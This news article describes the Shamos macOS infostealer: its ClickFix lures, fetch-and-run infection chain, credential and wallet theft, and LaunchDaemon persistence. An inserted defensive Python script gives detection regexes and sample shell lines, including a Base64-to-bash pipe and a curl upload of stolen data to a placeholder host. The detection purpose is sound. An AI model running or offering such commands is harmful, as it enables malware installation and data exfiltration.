New Mac Malware “Shamos” Steals Sensitive Data

by Tekmono Editorial Team
25/08/2025
in News

A new infostealer named ‘Shamos’ is actively targeting Mac devices through deceptive “ClickFix” attacks that mimic troubleshooting guides and software fixes. The malware has been identified as a variant of the Atomic macOS Stealer (AMOS).

Shamos is designed to steal sensitive data and credentials stored in web browsers, Keychain items, Apple Notes, and cryptocurrency wallets. The malware was developed by the cybercriminal group known as “COOKIE SPIDER.” CrowdStrike, which detected Shamos, reports attempted infections since June 2025 across more than 300 of the environments it monitors globally.

The malware is disseminated through ClickFix attacks, often involving malvertising or fake GitHub repositories that trick users into executing shell commands within the macOS Terminal. These attacks lure victims by prompting them to run commands under the guise of installing software or resolving fictitious errors.

Executing these commands results in the download and execution of Shamos on the targeted device. The deceptive ads or spoofed pages, such as “mac-safer[.]com” and “rescue-mac[.]com,” claim to offer solutions to common macOS problems, enticing users to copy and paste provided commands to purportedly fix the issues.

Instead of providing any genuine fix, the command decodes a Base64-encoded URL and fetches a malicious Bash script from a remote server. This script captures the user’s password, downloads the Shamos Mach-O executable, and then prepares and runs it using ‘xattr’ (to remove the quarantine flag) and ‘chmod’ (to make the binary executable), effectively bypassing Gatekeeper.

Once executed, Shamos initiates anti-VM commands to detect sandbox environments and then uses AppleScript commands for host reconnaissance and data collection. The malware searches for cryptocurrency wallet files, keychain data, Apple Notes data, and browser-stored information.

After gathering the data, Shamos packages it into an archive named ‘out.zip’ and transmits it to the attacker using curl. If Shamos is executed with sudo privileges, it creates a plist file (com.finder.helper.plist) and stores it in the user’s LaunchDaemons directory so that it is launched automatically at system startup, giving it persistence.
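The chain described above leaves a few host-side indicators a defender can look for. The following Python script is an added example, not code from this article or from CrowdStrike: it applies constructed regex heuristics (Base64 decode piped into a shell, quarantine-flag removal, chmod, curl upload of ‘out.zip’) to constructed shell-history lines and checks LaunchDaemons directories for the plist name the article reports. The pattern names, sample lines and function names are my own assumptions.

```python
import re
from pathlib import Path
from typing import Dict, List, Tuple

# Heuristics for the ClickFix chain the article describes: a Base64-decoded command
# piped into a shell, xattr stripping the quarantine flag, chmod marking the dropped
# binary executable, and curl pushing 'out.zip' out. The patterns are constructed
# for this example; they are not CrowdStrike's detection logic.
INDICATORS: Dict[str, "re.Pattern"] = {
    "base64_to_shell": re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:ba|z)?sh\b"),
    "quarantine_strip": re.compile(r"\bxattr\b.*(?:\s-c\b|com\.apple\.quarantine)"),
    "make_executable": re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]{3,4})\b"),
    "curl_exfil_zip": re.compile(r"\bcurl\b.*(?:-F|-T|--upload-file|--data-binary)\b.*out\.zip"),
}

def score_command(cmd: str) -> List[str]:
    """Names of every indicator matching a single command line (empty if clean)."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def triage_shell_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Keep only lines that trip at least one indicator, paired with their tags."""
    scored = ((line, score_command(line)) for line in lines)
    return [(line, tags) for line, tags in scored if tags]

# Persistence artifact named in the article. It says the plist is stored in the
# user's LaunchDaemons directory; the system-wide path is checked as well.
PERSISTENCE_NAMES = ("com.finder.helper.plist",)
DEFAULT_DAEMON_DIRS = ("/Library/LaunchDaemons", "~/Library/LaunchDaemons")

def find_persistence(daemon_dirs=DEFAULT_DAEMON_DIRS) -> List[str]:
    """Full paths of any known Shamos plist present in the given directories."""
    found = []
    for d in daemon_dirs:
        base = Path(d).expanduser()
        if base.is_dir():
            found += [str(base / n) for n in PERSISTENCE_NAMES if (base / n).exists()]
    return found

# Constructed sample shell history; the Base64 "payload" is a literal placeholder.
SAMPLE_LOG = [
    "brew install wget",
    "echo 'BASE64_PLACEHOLDER' | base64 -D | bash",
    "xattr -c /tmp/update && chmod +x /tmp/update",
    "curl -F 'file=@out.zip' http://example.invalid/upload",
    "ls -la ~/Library",
]

if __name__ == "__main__":
    for line, tags in triage_shell_log(SAMPLE_LOG):
        print(f"{', '.join(tags):<34} {line}")
    print("persistence:", find_persistence() or "none found")
```

On a real host, feed it the contents of the user's shell history or EDR process telemetry instead of SAMPLE_LOG; a single tag is a lead to review, while quarantine removal followed by chmod and a curl upload in one session is the full pattern the article describes.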

CrowdStrike also observed that Shamos can download additional payloads into the victim’s home directory, including a spoofed Ledger Live wallet app and a botnet module. macOS users are strongly advised against executing commands found online unless they fully understand their function.

Similarly, caution should be exercised with GitHub repositories, as malicious projects are often hosted there, aiming to infect unsuspecting users. When encountering issues with macOS, users should avoid sponsored search results and instead seek assistance from official Apple Community forums or the system’s built-in Help feature.

ClickFix attacks have become increasingly prevalent for malware distribution, with threat actors employing them in TikTok videos, disguising them as captchas, or posing as fixes for fake Google Meet errors. This tactic has proven highly effective and has been utilized in ransomware attacks and by state-sponsored threat actors.
